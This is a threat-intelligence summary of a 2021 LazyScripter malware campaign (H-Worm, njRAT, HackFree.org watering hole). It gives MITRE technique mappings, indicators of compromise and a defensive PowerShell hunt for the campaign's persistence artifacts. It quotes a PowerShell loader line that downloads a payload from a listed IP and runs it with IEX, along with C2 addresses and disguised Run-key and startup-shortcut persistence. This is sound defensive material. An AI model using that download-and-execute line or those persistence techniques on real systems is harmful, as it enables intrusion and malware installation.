Researchers tracked a LazyScripter campaign in 2021 targeting European entities, revealing a double-compromise chain involving H-Worm and njRAT delivered via obfuscated scripts. They also uncovered use of a free online obfuscation service and a waterhole-style setup via HackFree, enabling dual infections for some victims. #LazyScripter #H-Worm #njRAT #HackFree #UNWTO #IATA #duckdns
Keypoints
- LazyScripter is identified as the threat actor behind a 2021 European-targeted infection campaign.
- The campaign features a “double compromise” where LazyScripter’s script loader enables a second threat (H-Worm) and a potential njRAT payload.
- Initial access occurs via spearphishing attachments: a PDF and two JavaScript files were delivered by phishing emails.
- The JavaScript files are highly obfuscated and drop a VBS script that establishes persistence and C2 contact.
- Persistence uses startup folder LNK, startup registry keys, and a scheduled/auto-run mechanism to maintain access.
- H-Worm is delivered via a deobfuscated VBS loader, with a date-based trigger that can drop njRAT and reconfigure persistence.
- HackFree.org is used as an online obfuscation service and waterhole component, injecting malware into obfuscated scripts and enabling broader infection.
MITRE Techniques
- [T1566.002] Spearphishing Attachment – Initial access via phishing emails attaching a PDF and two JavaScript files. “phishing emails… attach three compressed files: a pdf document, and two JavaScript files.”
- [T1027.001] Obfuscated/Compressed Files and Information – Use of a free online obfuscating tool to hide payloads and inject a downloader for njRAT. “…the usage of a free and popular online obfuscating tool for scripts, which would inject their own downloader for a njRAT sample within LazyScripter’s malware.”
- [T1059.005] Visual Basic/VBScript – VBScript loader that drops additional payloads and enables multi-stage infection. “the VBS script acted as some sort of loader for the final stage artifact…”
- [T1059.001] PowerShell – Direct PowerShell execution to fetch and run code. “[System.Net.WebClient]$webClient = New-Object System.Net.WebClient;… IEX $results”
- [T1105] Ingress Tool Transfer – Downloading/Executing code from a remote URL as part of the loader sequence. “…OpenRead(‘http://185.81.157.186/NDA/199.png’); … IEX $results”
- [T1547.001] Boot or Logon Autostart Execution – Persistence via Run Keys and Startup Folder equivalents. “persistence mechanism would be established using the registry keys: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\tk”
- [T1023] Shortcut Modification – Creation of a startup LNK file to trigger execution. “C:\Users\Lucas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windowsUpdate.lnk”
- [T1071.001] Web Protocols – C2 communications over HTTP(S). “C2 contact through HTTP POST requests to the port 449 of the IP address 45.91.92.112”
- [T1189] Drive-by Compromise/Watering Hole – HackFree.org waterhole activity injecting malware into obfuscated scripts. “hackfree[.]org was injecting their own malware in every obfuscated script via their website, and this would lead … a waterhole attack.”
Indicators of Compromise
- [URL] http://185.81[.]157.186/NDA/199.png – delivered payload URL
- [URL] http://157.245[.]250.76/MORE%20INFORMATION%20ON%20OFFERS.zip – delivered payload URL
- [File] C:\Users\Lucas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windowsUpdate.lnk – startup persistence file
- [Registry] HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\tk – Run key
- [Registry] HKU\Software\Microsoft\Windows\CurrentVersion\Run\tk – Run key
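A defender-side hunt for the two persistence artifacts listed above (the `tk` Run value and the Startup-folder `windowsUpdate.lnk`), added here as an example; it is not code from the report or the researchers. It assumes the value and shortcut names given in the indicators, checks the 32-bit HKLM Run view plus every loaded user hive under HKEY_USERS, and resolves each shortcut's target so an analyst can triage what it launches.

```powershell
# Hunt for the LazyScripter persistence artifacts described above.
# Assumptions (from the indicators on this page): Run value name 'tk',
# Startup shortcut name 'windowsUpdate.lnk'. Run from an elevated shell.
$runValueName = 'tk'
$lnkName      = 'windowsUpdate.lnk'
$findings     = @()

# 1. Run keys: the Wow6432Node view in HKLM and the Run key of every loaded user hive.
$runKeys = @('HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run')
if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}
Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -notlike '*_Classes' } |
    ForEach-Object {
        $runKeys += "HKU:\$($_.PSChildName)\Software\Microsoft\Windows\CurrentVersion\Run"
    }

foreach ($key in $runKeys) {
    # Get-ItemProperty fails quietly when the key or the value is absent.
    $value = Get-ItemProperty -Path $key -Name $runValueName -ErrorAction SilentlyContinue
    if ($value) {
        $findings += [pscustomobject]@{
            Type     = 'RunKey'
            Location = "$key\$runValueName"
            Data     = $value.$runValueName
        }
    }
}

# 2. Startup-folder shortcut in every user profile; resolve the LNK target for triage.
$shell = New-Object -ComObject WScript.Shell
Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue | ForEach-Object {
    $lnk = Join-Path $_.FullName "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$lnkName"
    if (Test-Path $lnk) {
        $sc = $shell.CreateShortcut($lnk)
        $findings += [pscustomobject]@{
            Type     = 'StartupLnk'
            Location = $lnk
            Data     = "$($sc.TargetPath) $($sc.Arguments)"
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize } else { 'No matching persistence artifacts found.' }
```

The `Data` column holds the command the artifact would execute at logon, which is what to pivot on (script path, downloader URL) when confirming a hit.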